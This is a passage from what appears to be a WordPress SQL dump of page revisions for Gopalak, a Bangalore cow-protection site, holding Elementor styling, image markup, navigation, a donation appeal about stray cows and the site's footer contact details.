loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/Contribute-123.png 1263w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-300x119.png 300w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-1024x405.png 1024w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-768x304.png 768w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-50x20.png 50w, https://gopalak.in/wp-content/uploads/2022/10/Contribute-123-48x19.png 48w\" sizes=\"(max-width: 1263px) 100vw, 1263px\" />															\n		<p>In India, cows wander on streets and there are hardly any people caring about them. They are left just as stray dogs where they roam on the roads, with some even bullied by the passers-by. Such cows are always hit by the people who seem it as fun to do so. Such cows need to be adopted or tamed by the locals in order to prevent them from the bullies or tortures they face. stress on these cows and requests people to join hands so that together we all can save our Gau Mata. It’s unfortunate to see that in India, where cows are worshipped as a Goddess, many people choose to ignore the conditions in which they are left to litter around and roam like just any other stray animal. Cows are valuable and it’s our duty to save this breed for it is only for our own benefit. We get milk by the cow which is, as we all know, necessary for our health. We need to preserve this rare species and for that it is necessary that people come forward to adopt them.</p>[table id=1 /]		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Donate','','inherit','closed','closed','','1816-revision-v1','','','2022-10-28 10:34:15','2022-10-28 05:04:15','',1816,'https://gopalak.in/?p=1992',0,'revision','',0),(1993,1,'2022-10-28 10:35:14','2022-10-28 05:05:14','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper{text-align:left;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-direction:row;flex-direction:row}.elementor-widget-image-box.elementor-position-top .elementor-image-box-img{margin:auto}.elementor-widget-image-box.elementor-vertical-align-top .elementor-image-box-wrapper{-webkit-box-align:start;-ms-flex-align:start;align-items:flex-start}.elementor-widget-image-box.elementor-vertical-align-middle .elementor-image-box-wrapper{-webkit-box-align:center;-ms-flex-align:center;align-items:center}.elementor-widget-image-box.elementor-vertical-align-bottom .elementor-image-box-wrapper{-webkit-box-align:end;-ms-flex-align:end;align-items:flex-end}}@media (max-width:767px){.elementor-widget-image-box .elementor-image-box-img{margin-left:auto!important;margin-right:auto!important;margin-bottom:15px}}.elementor-widget-image-box .elementor-image-box-img{display:inline-block}.elementor-widget-image-box .elementor-image-box-title a{color:inherit}.elementor-widget-image-box .elementor-image-box-wrapper{text-align:center}.elementor-widget-image-box .elementor-image-box-description{margin:0}</style><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/depositphotos_12743475-stock-photo-farm-cattle.webp\" title=\"depositphotos_12743475-stock-photo-farm-cattle\" alt=\"depositphotos_12743475-stock-photo-farm-cattle\" /></figure><h3>Adopt/Donate</h3><p>You can donate any amount of your choice which will be used for fodder to feed cows.</p>		\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Click here\n					</a>\n			<figure><img src=\"https://gopalak.in/wp-content/uploads/elementor/thumbs/banner1-puue8o9j5oqv02mjuegklieu6t8ry4rsfq4igtrp88.jpg\" title=\"banner1\" alt=\"banner1\" /></figure><h3>Shop With Us</h3><p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Click here\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-heading-title{padding:0;margin:0;line-height:1}.elementor-widget-heading .elementor-heading-title[class*=elementor-size-]>a{color:inherit;font-size:inherit;line-height:inherit}.elementor-widget-heading .elementor-heading-title.elementor-size-small{font-size:15px}.elementor-widget-heading .elementor-heading-title.elementor-size-medium{font-size:19px}.elementor-widget-heading .elementor-heading-title.elementor-size-large{font-size:29px}.elementor-widget-heading .elementor-heading-title.elementor-size-xl{font-size:39px}.elementor-widget-heading .elementor-heading-title.elementor-size-xxl{font-size:59px}</style><h2>About Gopalak</h2>		\n		<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br />Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being</p>		\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						Click here\n					</a>\n		https://www.youtube.com/watch?v=0wll4Km5AU8https://www.youtube.com/watch?v=bEyCT3KsAMQhttps://www.youtube.com/watch?v=sVQg0-3WSc4		\n			<h2>Gallery</h2>		\n		<p>\"Cow is the source of progress and prosperity. In many ways it is superior to one’s mother\"</p>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/banner1-150x150.jpg\" alt=\"banner1\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/istockphoto-1221688781-612x612-1-150x150.jpg\" alt=\"Classic red barn and silo set in a field of green corn and under a blue sky with copy space if needed.  Traditional rural scene.\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/cows-farming-on-green-meadow-260nw-1704884002-150x150.webp\" alt=\"cows-farming-on-green-meadow-260nw-1704884002\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/803471-150x150.jpg\" alt=\"803471\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/09/279356-150x150.webp\" alt=\"279356\" /></figure>			\n												Previous\n												Next\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-social-icons.elementor-grid-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-mobile-0 .elementor-widget-container,.elementor-widget-social-icons.elementor-grid-tablet-0 .elementor-widget-container{line-height:1;font-size:0}.elementor-widget-social-icons:not(.elementor-grid-0):not(.elementor-grid-tablet-0):not(.elementor-grid-mobile-0) .elementor-grid{display:inline-grid}.elementor-widget-social-icons .elementor-grid{grid-column-gap:var(--grid-column-gap,5px);grid-row-gap:var(--grid-row-gap,5px);grid-template-columns:var(--grid-template-columns);-webkit-box-pack:var(--justify-content,center);-ms-flex-pack:var(--justify-content,center);justify-content:var(--justify-content,center);justify-items:var(--justify-content,center)}.elementor-icon.elementor-social-icon{font-size:var(--icon-size,25px);line-height:var(--icon-size,25px);width:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)));height:calc(var(--icon-size, 25px) + (2 * var(--icon-padding, .5em)))}.elementor-social-icon{--e-social-icon-icon-color:#fff;display:-webkit-inline-box;display:-ms-inline-flexbox;display:inline-flex;background-color:#818a91;-webkit-box-align:center;-ms-flex-align:center;align-items:center;-webkit-box-pack:center;-ms-flex-pack:center;justify-content:center;text-align:center;cursor:pointer}.elementor-social-icon i{color:var(--e-social-icon-icon-color)}.elementor-social-icon svg{fill:var(--e-social-icon-icon-color)}.elementor-social-icon:last-child{margin:0}.elementor-social-icon:hover{opacity:.9;color:#fff}.elementor-social-icon-android{background-color:#a4c639}.elementor-social-icon-apple{background-color:#999}.elementor-social-icon-behance{background-color:#1769ff}.elementor-social-icon-bitbucket{background-color:#205081}.elementor-social-icon-codepen{background-color:#000}.elementor-social-icon-delicious{background-color:#39f}.elementor-social-icon-deviantart{background-color:#05cc47}.elementor-social-icon-digg{background-color:#005be2}.elementor-social-icon-dribbble{background-color:#ea4c89}.elementor-social-icon-elementor{background-color:#d30c5c}.elementor-social-icon-envelope{background-color:#ea4335}.elementor-social-icon-facebook,.elementor-social-icon-facebook-f{background-color:#3b5998}.elementor-social-icon-flickr{background-color:#0063dc}.elementor-social-icon-foursquare{background-color:#2d5be3}.elementor-social-icon-free-code-camp,.elementor-social-icon-freecodecamp{background-color:#006400}.elementor-social-icon-github{background-color:#333}.elementor-social-icon-gitlab{background-color:#e24329}.elementor-social-icon-globe{background-color:#818a91}.elementor-social-icon-google-plus,.elementor-social-icon-google-plus-g{background-color:#dd4b39}.elementor-social-icon-houzz{background-color:#7ac142}.elementor-social-icon-instagram{background-color:#262626}.elementor-social-icon-jsfiddle{background-color:#487aa2}.elementor-social-icon-link{background-color:#818a91}.elementor-social-icon-linkedin,.elementor-social-icon-linkedin-in{background-color:#0077b5}.elementor-social-icon-medium{background-color:#00ab6b}.elementor-social-icon-meetup{background-color:#ec1c40}.elementor-social-icon-mixcloud{background-color:#273a4b}.elementor-social-icon-odnoklassniki{background-color:#f4731c}.elementor-social-icon-pinterest{background-color:#bd081c}.elementor-social-icon-product-hunt{background-color:#da552f}.elementor-social-icon-reddit{background-color:#ff4500}.elementor-social-icon-rss{background-color:#f26522}.elementor-social-icon-shopping-cart{background-color:#4caf50}.elementor-social-icon-skype{background-color:#00aff0}.elementor-social-icon-slideshare{background-color:#0077b5}.elementor-social-icon-snapchat{background-color:#fffc00}.elementor-social-icon-soundcloud{background-color:#f80}.elementor-social-icon-spotify{background-color:#2ebd59}.elementor-social-icon-stack-overflow{background-color:#fe7a15}.elementor-social-icon-steam{background-color:#00adee}.elementor-social-icon-stumbleupon{background-color:#eb4924}.elementor-social-icon-telegram{background-color:#2ca5e0}.elementor-social-icon-thumb-tack{background-color:#1aa1d8}.elementor-social-icon-tripadvisor{background-color:#589442}.elementor-social-icon-tumblr{background-color:#35465c}.elementor-social-icon-twitch{background-color:#6441a5}.elementor-social-icon-twitter{background-color:#1da1f2}.elementor-social-icon-viber{background-color:#665cac}.elementor-social-icon-vimeo{background-color:#1ab7ea}.elementor-social-icon-vk{background-color:#45668e}.elementor-social-icon-weibo{background-color:#dd2430}.elementor-social-icon-weixin{background-color:#31a918}.elementor-social-icon-whatsapp{background-color:#25d366}.elementor-social-icon-wordpress{background-color:#21759b}.elementor-social-icon-xing{background-color:#026466}.elementor-social-icon-yelp{background-color:#af0606}.elementor-social-icon-youtube{background-color:#cd201f}.elementor-social-icon-500px{background-color:#0099e5}.elementor-shape-rounded .elementor-icon.elementor-social-icon{border-radius:10%}.elementor-shape-circle .elementor-icon.elementor-social-icon{border-radius:50%}</style>		\n					<a target=\"_blank\" rel=\"noopener\">\n						Facebook\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Twitter\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Youtube\n											</a>\n					<a target=\"_blank\" rel=\"noopener\">\n						Instagram\n											</a>\n															<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<h2>Help</h2>		\n			<h2><a href=\"https://gopalak.in/pricing-policy/\">Pricing Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/terms-and-conditions/\">Terms & Condition</a></h2>		\n			<h2><a href=\"https://gopalak.in/privacy-policy-2/\">Privacy Policy</a></h2>		\n			<h2><a href=\"https://gopalak.in/refunds-cancellation/\">Refunds/Cancellation</a></h2>		\n			<h2><a href=\"https://gopalak.in/vendor-register/\">Vendor Registartion</a></h2>		\n			<h2>Address</h2>		\n			 #800 Spandana towers\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\nContact : (+91)7411722844<br>\nE-mail id: namaste@gopalak.in\n		<p>© 2022 <a href=\"https://gopalak.in/\">Gopalak</a> Designed by Homedirect</p>','Home','','inherit','closed','closed','','1373-revision-v1','','','2022-10-28 10:35:14','2022-10-28 05:05:14','',1373,'https://gopalak.in/?p=1993',0,'revision','',0),(1994,1,'2022-10-28 10:35:14','2022-10-28 05:05:14','<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image{text-align:center}.elementor-widget-image a{display:inline-block}.elementor-widget-image a img[src$=\".svg\"]{width:48px}.elementor-widget-image img{vertical-align:middle;display:inline-block}</style>												<img width=\"150\" height=\"150\" src=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png\" alt=\"\" loading=\"lazy\" srcset=\"https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-150x150.png 150w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-300x300.png 300w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-320x320.png 320w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-50x50.png 50w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-100x100.png 100w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-48x48.png 48w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-270x270.png 270w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-192x192.png 192w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-180x180.png 180w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0-32x32.png 32w, https://gopalak.in/wp-content/uploads/2022/10/elementor/thumbs/cropped-GOPALAK-COIN-2.0-pwh7vrjfdc81vqqzgamifnehpvyy4kvm3g29jja5ym.png 75w, https://gopalak.in/wp-content/uploads/2022/10/cropped-GOPALAK-COIN-2.0.png 512w\" sizes=\"(max-width: 150px) 100vw, 150px\" />															\n			<a href=\"https://gopalak.in/\" role=\"button\">\n						Home\n					</a>\n			<a href=\"https://gopalak.in/shop/\" role=\"button\">\n						Shop\n					</a>\n			<a href=\"https://gopalak.in/donate/\" role=\"button\">\n						Adopt/Donate\n					</a>\n			<a href=\"https://gopalak.in/aboutus/\" role=\"button\">\n						About us\n					</a>\n			<a href=\"https://gopalak.in/my-account/\" role=\"button\">\n						My Account\n					</a>\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-carousel .swiper-container{position:static}.elementor-widget-image-carousel .swiper-container .swiper-slide figure{line-height:inherit}.elementor-widget-image-carousel .swiper-slide{text-align:center}.elementor-image-carousel-wrapper:not(.swiper-container-initialized) .swiper-slide{max-width:calc(100% / var(--e-image-carousel-slides-to-show, 3))}</style>		\n								<figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2602864-scaled.jpg\" alt=\"pexels-mark-stebnicki-2602864\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kat-smith-735976-scaled.jpg\" alt=\"pexels-kat-smith-735976\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-mark-stebnicki-2252557-scaled.jpg\" alt=\"pexels-mark-stebnicki-2252557\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-min-an-1455455-scaled.jpg\" alt=\"pexels-min-an-1455455\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-roman-odintsov-8747798-scaled.jpg\" alt=\"pexels-roman-odintsov-8747798\" /></figure><figure><img src=\"https://gopalak.in/wp-content/uploads/2022/10/pexels-kelly-2881385-scaled.jpg\" alt=\"pexels-kelly-2881385\" /></figure>			\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-column .elementor-spacer-inner{height:var(--spacer-size)}.e-container{--container-widget-width:100%}.e-container>.elementor-widget-spacer{width:var(--container-widget-width,var(--spacer-size));-ms-flex-item-align:stretch;align-self:stretch;-ms-flex-negative:0;flex-shrink:0}.e-container>.elementor-widget-spacer>.elementor-widget-container,.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer{height:100%}.e-container>.elementor-widget-spacer>.elementor-widget-container>.elementor-spacer>.elementor-spacer-inner{height:var(--container-widget-height,var(--spacer-size))}</style>		\n			<style>/*! elementor - v3.7.8 - 02-10-2022 */\n.elementor-widget-image-box .elementor-image-box-content{width:100%}@media (min-width:768px){.elementor-widget-image-box.elementor-position-left .elementor-image-box-wrapper,.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{display:-webkit-box;display:-ms-flexbox;display:flex}.elementor-widget-image-box.elementor-position-right .elementor-image-box-wrapper{text-align:right;-webkit-box-orient:horizontal;-webkit-box-direction:reverse;-ms-flex-direction:row-reverse;flex-direction:row-reverse}.elementor-widget-image-box.elementor-position-left 